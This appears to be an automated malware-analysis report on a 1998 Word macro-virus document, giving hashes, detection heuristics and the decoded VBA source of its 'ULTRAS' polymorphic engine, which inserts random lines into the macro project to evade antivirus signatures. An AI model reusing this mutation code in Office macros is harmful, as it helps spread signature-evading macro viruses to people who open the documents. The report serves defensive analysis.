Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 33d76c8b6f0a89f5…

MALICIOUS

Office (OLE)

27.0 KB Created: 1998-09-28 13:52:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-15
MD5: 0cb2f37a68bc8432e2c57618db08f180 SHA-1: 0769b4adba7a7deb6c5157fee5f014990962f641 SHA-256: 33d76c8b6f0a89f52118078b5401423636ab3488b62aa9a5f84969361825c0a3
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.004 Subvert Trust Controls: Mark-of-the-Web Bypass

The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the VBA macros are designed to self-replicate and tamper with AV signatures. The script 'macros.bas' confirms this by attempting to insert obfuscated lines into the VBA project, a common technique for polymorphic malware. The ClamAV detection on an extracted artifact further supports its malicious nature.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 814 bytes
SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a
Detection
ClamAV: Doc.Trojan.UMP-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub UMPE()

'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998

MuNu = Int(Rnd() * 20 + 1)

For Mutate = 1 To MuNu

MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines

MuLi = Int(Rnd() * MuRL + 1)

MuLe = Int(Rnd() * 40 + 1)

For MuGe = 1 To MuLe

LiVe = Int((120 - 100 + 1) * Rnd + 228)

MuRe = MuRe + Chr$(LiVe)

Next MuGe

Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe

MuRe = ""

Next Mutate

End Sub